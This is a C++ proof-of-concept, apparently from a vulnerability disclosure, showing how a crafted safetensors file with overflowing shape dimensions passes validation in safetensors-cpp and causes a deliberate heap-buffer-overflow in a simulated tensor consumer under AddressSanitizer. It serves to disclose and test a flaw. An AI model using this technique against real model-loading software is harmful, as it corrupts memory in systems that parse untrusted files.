File size: 4,424 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
/**
 * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow
 *
 * This simulates what a real consumer of safetensors-cpp would do:
 * 1. Load a safetensors file
 * 2. Get tensor shape
 * 3. Allocate buffer based on shape size
 * 4. Copy/iterate data using shape dimensions
 *
 * The malicious file declares shape dimensions whose product overflows size_t, so:
 * - Buffer allocation uses the wrapped-around (small) element count
 * - Data iteration uses the raw shape dimensions, which imply a huge size
 * - Result: heap buffer overflow
 *
 * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc
 * Run: ./crash_overflow overflow_tensor.safetensors
 */

#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>

#include "safetensors.hh"

/**
 * Simulated consumer function: reshape tensor data according to declared shape.
 * This is what ML frameworks typically do after loading a safetensors file.
 *
 * Allocates a buffer sized from get_shape_size() (which wraps around for the
 * crafted input file), fills it from the tensor's data range, then deliberately
 * writes floats using shape[0] as the loop bound. When the element count has
 * wrapped, that write runs past the allocation and ASan reports a
 * heap-buffer-overflow. That out-of-bounds write is the point of this PoC.
 *
 * @param tensor  tensor metadata (dtype, shape, data_offsets) from the parser
 * @param data    start of the safetensors data buffer; the tensor's bytes are
 *                read from data + tensor.data_offsets[0]
 */
void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) {
    // A real consumer would use shape to determine iteration bounds
    const size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);

    // Compute total elements from shape (uses the SAME vulnerable multiplication).
    // For the crafted file this wraps around to a tiny value.
    const size_t total_elements = safetensors::get_shape_size(tensor);

    // Allocate output buffer based on computed size
    const size_t buf_size = total_elements * dtype_bytes;
    printf("  Allocating buffer: %zu bytes\n", buf_size);
    float *output = static_cast<float *>(malloc(buf_size));

    if (!output) {
        printf("  malloc failed\n");
        return;
    }

    // Copy the data - this is "safe" because both use the same overflowed size
    // But the SHAPE is what matters for downstream processing
    memcpy(output, data + tensor.data_offsets[0], buf_size);

    printf("  Buffer allocated and filled: %zu bytes\n", buf_size);

    // A rank-0 tensor has no dimension to iterate. Reading shape[0] here would
    // index past the end of the shape vector, which is unrelated to the bug
    // being demonstrated.
    if (tensor.shape.empty()) {
        printf("  Tensor has no dimensions; nothing to iterate\n");
        free(output);
        return;
    }

    // Print every declared dimension instead of assuming rank 3. Indexing
    // shape[1]/shape[2] on a lower-rank tensor would be out-of-range access.
    printf("  Shape claims ");
    for (size_t d = 0; d < tensor.shape.size(); d++) {
        printf("%s%zu", d == 0 ? "" : " x ", static_cast<size_t>(tensor.shape[d]));
    }
    printf(" = way more than %zu elements\n", total_elements);

    // Demonstrate: iterate the first dimension only to show OOB access
    const size_t dim0 = static_cast<size_t>(tensor.shape[0]);
    printf("  Iterating shape[0]=%zu elements (but buffer only has %zu)...\n",
           dim0, total_elements);

    // This writes beyond the allocated buffer -> HEAP OVERFLOW (intentional).
    // ASan will catch this immediately. The 100-write cap bounds how far past
    // the buffer the loop can go.
    for (size_t i = 0; i < dim0 && i < 100; i++) {
        output[i] = 0.0f;
    }

    printf("  OOB write triggered (ASan should report heap-buffer-overflow)\n");

    free(output);
}

/**
 * Entry point: load a safetensors file into memory, parse and validate it
 * with safetensors-cpp, then hand every tensor to process_tensor().
 *
 * @param argc  argument count
 * @param argv  argv[1], if present, overrides the default input path
 * @return 0 after processing all tensors; 1 if the file cannot be opened,
 *         sized, read, parsed, or validated.
 */
int main(int argc, char *argv[]) {
    const char *filepath = "overflow_tensor.safetensors";
    if (argc > 1) filepath = argv[1];

    printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n");

    // Load file (opened at the end so tellg() reports its size)
    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
    if (!ifs.is_open()) {
        fprintf(stderr, "Failed to open %s\n", filepath);
        return 1;
    }
    // tellg() returns -1 on failure; converting that to size_t would request
    // an enormous allocation.
    const std::streamoff end = ifs.tellg();
    if (end < 0) {
        fprintf(stderr, "Failed to determine size of %s\n", filepath);
        return 1;
    }
    const size_t filesize = static_cast<size_t>(end);
    ifs.seekg(0);
    std::vector<uint8_t> data(filesize);
    // A short read would otherwise silently leave zero bytes in the buffer.
    if (!ifs.read(reinterpret_cast<char *>(data.data()),
                  static_cast<std::streamsize>(filesize))) {
        fprintf(stderr, "Failed to read %s\n", filepath);
        return 1;
    }
    ifs.close();

    // Parse
    safetensors::safetensors_t st;
    std::string warn, err;
    bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err);

    if (!warn.empty()) {
        printf("Warning: %s\n", warn.c_str());
    }

    if (!ok) {
        printf("FAILED to load: %s\n", err.c_str());
        return 1;
    }

    // Validate (this passes due to overflow)
    std::string val_err;
    if (!safetensors::validate_data_offsets(st, val_err)) {
        printf("Validation failed: %s\n", val_err.c_str());
        return 1;
    }

    printf("[+] File loaded and validated successfully\n");
    printf("[*] Processing tensors...\n\n");

    // Process each tensor. The key list is fetched once rather than per
    // iteration; binding to a const reference is valid whether keys()
    // returns by value or by reference.
    const auto &keys = st.tensors.keys();
    for (size_t i = 0; i < st.tensors.size(); i++) {
        const std::string &key = keys[i];
        safetensors::tensor_t tensor;
        st.tensors.at(i, &tensor);

        printf("Processing tensor '%s':\n", key.c_str());
        process_tensor(tensor, st.storage.data());
    }

    return 0;
}